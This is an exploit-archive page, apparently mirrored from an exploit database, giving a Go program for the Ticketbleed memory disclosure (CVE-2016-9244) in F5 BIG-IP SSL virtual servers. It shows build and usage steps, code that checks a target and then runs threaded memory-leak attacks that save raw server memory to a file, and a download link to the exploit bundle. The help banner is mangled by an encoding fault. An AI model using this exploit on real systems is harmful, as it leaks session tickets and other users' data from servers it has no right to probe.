F5 BIG-IP SSL Virtual Server - Memory Disclosure



EKU-ID: 6289 CVE: 2016-9244 OSVDB-ID:
Author: Ege Balci Published: 2017-02-13 Verified: Verified
Download:

Rating

¡î¡î¡î¡î¡î
Home


/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege BalcÄ¡À]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]
 
 
 
 
BUILD:
    go get github.com/EgeBalci/Ticketbleed
    go build Ticketbleed.go
 
USAGE:
    ./ticketbleed <options> <ip:port>
OPTIONS:
    -o, --out   Output filename for raw memory
    -s, --size  Size in bytes to read
    -h, --help  Print this message
 
*/
package main
 
import "github.com/EgeBalci/Ticketbleed"
import "strconv"
import "strings"
import "fmt"
import "os"
 
 
var OutputFile string = ""
var BleedSize int = 0
 
func main() {
 
 
    ARGS := os.Args[1:]
    if len(ARGS) < 1 || len(ARGS) > 5{
        fmt.Println(Help)
        os.Exit(1)
    }
 
    for i := 0; i < len(ARGS); i++{
 
        if ARGS[i] == "-h" || ARGS[i] == "--help"{
            fmt.Println(Help)
            os.Exit(1)
        }
 
        if ARGS[i] == "-o" || ARGS[i] == "--out"{
            OutputFile = ARGS[i+1]
        }
 
        if ARGS[i] == "-s" || ARGS[i] == "--size"{
            Size,err := strconv.Atoi(ARGS[i+1])
            if err != nil {
                fmt.Println("[-] ERROR: Invalid size value !")
                os.Exit(1)
            }
            if Size < 0 {
                fmt.Println("[-] ERROR: Size can't be smaller than 0")
                os.Exit(1)
            }else{
                BleedSize = Size
            }
        }
    }
 
    if OutputFile != "" {
        File, FileErr := os.Create(OutputFile)
        if FileErr != nil {
            fmt.Println("[-] ERROR: While creating output file !")
            os.Exit(1)
        }
        File.Close()
        fmt.Println("[*] Output file: "+OutputFile)
    }
 
    VulnStatus := Ticketbleed.Check(ARGS[0])                                // First check if it's vulnerable
    fmt.Println(VulnStatus)
    if strings.Contains(VulnStatus, "[+]") {
        
        go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))          // With using multiple threads it is easyer to move on stack
        Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))             // Othervise server echoes back alot of duplicate value
    }
 
}
 
 
 
var Help string = `
â¨C„â¨C„â¨C„â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C¡° â¨Cˆâ¨Cˆâ¨C¡° â¨C„â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C„   â¨Cˆâ¨Cˆ â¨C„â¨Cˆâ¨C€â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C„â¨C„â¨C„â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C¡° â¨C„â¨C„â¨C„â¨C„    â¨Cˆâ¨Cˆâ¨C¡°    â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆ â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆ â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C„
â¨C¡°  â¨Cˆâ¨Cˆâ¨C¡¯ â¨C¡°â¨C¡¯â¨C¡°â¨Cˆâ¨Cˆâ¨C¡¯â¨C¡¯â¨Cˆâ¨Cˆâ¨C€ â¨C€â¨Cˆ   â¨Cˆâ¨Cˆâ¨C„â¨Cˆâ¨C¡¯ â¨C¡°â¨Cˆ   â¨C€â¨C¡°  â¨Cˆâ¨Cˆâ¨C¡¯ â¨C¡°â¨C¡¯â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C„ â¨C¡°â¨Cˆâ¨Cˆâ¨C¡¯    â¨C¡°â¨Cˆ   â¨C€ â¨C¡°â¨Cˆ   â¨C€ â¨C¡¯â¨Cˆâ¨Cˆâ¨C€ â¨Cˆâ¨Cˆâ¨CŒ
â¨C¡¯ â¨C¡°â¨Cˆâ¨Cˆâ¨C¡® â¨C¡¯â¨C¡®â¨C¡¯â¨Cˆâ¨Cˆâ¨C¡¯â¨C¡¯â¨C¡°â¨Cˆ    â¨C„ â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨C„â¨C¡® â¨C¡¯â¨Cˆâ¨Cˆâ¨Cˆ  â¨C¡¯ â¨C¡°â¨Cˆâ¨Cˆâ¨C¡® â¨C¡¯â¨C¡®â¨C¡¯â¨Cˆâ¨Cˆâ¨C¡¯ â¨C„â¨Cˆâ¨Cˆâ¨C¡¯â¨Cˆâ¨Cˆâ¨C¡®    â¨C¡¯â¨Cˆâ¨Cˆâ¨Cˆ   â¨C¡¯â¨Cˆâ¨Cˆâ¨Cˆ   â¨C¡®â¨Cˆâ¨Cˆ   â¨Cˆâ¨CŒ
â¨C¡® â¨C¡°â¨Cˆâ¨Cˆâ¨C¡° â¨C¡® â¨C¡®â¨Cˆâ¨Cˆâ¨C¡®â¨C¡¯â¨C¡°â¨C¡°â¨C„ â¨C„â¨Cˆâ¨Cˆâ¨C¡¯â¨C¡°â¨Cˆâ¨Cˆ â¨Cˆâ¨C„ â¨C¡¯â¨C¡°â¨Cˆ  â¨C„â¨C¡® â¨C¡°â¨Cˆâ¨Cˆâ¨C¡° â¨C¡® â¨C¡¯â¨Cˆâ¨Cˆâ¨C¡®â¨Cˆâ¨C€  â¨C¡¯â¨Cˆâ¨Cˆâ¨C¡®    â¨C¡¯â¨C¡°â¨Cˆ  â¨C„ â¨C¡¯â¨C¡°â¨Cˆ  â¨C„ â¨C¡®â¨C¡°â¨Cˆâ¨C„   â¨CŒ
  â¨C¡¯â¨Cˆâ¨Cˆâ¨C¡¯ â¨C¡® â¨C¡®â¨Cˆâ¨Cˆâ¨C¡®â¨C¡¯ â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨C€ â¨C¡®â¨C¡¯â¨Cˆâ¨Cˆâ¨C¡¯ â¨Cˆâ¨C„â¨C¡®â¨C¡¯â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C¡¯ â¨C¡¯â¨Cˆâ¨Cˆâ¨C¡¯ â¨C¡® â¨C¡®â¨C¡°â¨Cˆ  â¨C€â¨Cˆâ¨C¡°â¨C¡®â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C¡¯â¨C¡®â¨C¡¯â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C¡¯â¨C¡®â¨C¡¯â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C¡¯â¨C¡®â¨C¡¯â¨Cˆâ¨Cˆâ¨Cˆâ¨Cˆâ¨C¡°
  â¨C¡¯ â¨C¡®â¨C¡®   â¨C¡®â¨C¡°  â¨C¡® â¨C¡®â¨C¡¯ â¨C¡¯  â¨C¡®â¨C¡¯ â¨C¡¯â¨C¡¯ â¨C¡°â¨C¡¯â¨C¡®â¨C¡® â¨C¡¯â¨C¡® â¨C¡® â¨C¡¯ â¨C¡®â¨C¡®   â¨C¡®â¨C¡¯â¨C¡°â¨Cˆâ¨Cˆâ¨Cˆâ¨C€â¨C¡¯â¨C¡® â¨C¡¯â¨C¡®â¨C¡°  â¨C¡®â¨C¡®â¨C¡® â¨C¡¯â¨C¡® â¨C¡®â¨C¡®â¨C¡® â¨C¡¯â¨C¡® â¨C¡® â¨C¡¯â¨C¡¯â¨C¡°  â¨C¡¯
    â¨C¡®     â¨C¡¯ â¨C¡®  â¨C¡®  â¨C¡¯   â¨C¡® â¨C¡®â¨C¡¯ â¨C¡¯â¨C¡® â¨C¡® â¨C¡®  â¨C¡®   â¨C¡®    â¨C¡¯â¨C¡®â¨C¡¯   â¨C¡® â¨C¡® â¨C¡® â¨C¡¯  â¨C¡® â¨C¡® â¨C¡®  â¨C¡® â¨C¡® â¨C¡®  â¨C¡® â¨C¡® â¨C¡¯  â¨C¡¯
  â¨C¡®       â¨C¡¯ â¨C¡®â¨C¡®        â¨C¡® â¨C¡®â¨C¡® â¨C¡®    â¨C¡®    â¨C¡®       â¨C¡®    â¨C¡®   â¨C¡® â¨C¡®      â¨C¡®      â¨C¡®    â¨C¡® â¨C¡®  â¨C¡®
          â¨C¡®  â¨C¡® â¨C¡®      â¨C¡®  â¨C¡®      â¨C¡®  â¨C¡®         â¨C¡®          â¨C¡®  â¨C¡®   â¨C¡®  â¨C¡®   â¨C¡®  â¨C¡®   â¨C¡®   
             â¨C¡®                                    â¨C¡®                        â¨C¡®     
 
Author: Ege Balci
Github: github.com/EgeBalci
 
 
USAGE:
    ./ticketbleed <ip:port> <options>
OPTIONS:
    -o, --out   Output filename for raw memory
    -s, --size  Size in bytes to read
    -h, --help  Print this message
`
 
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip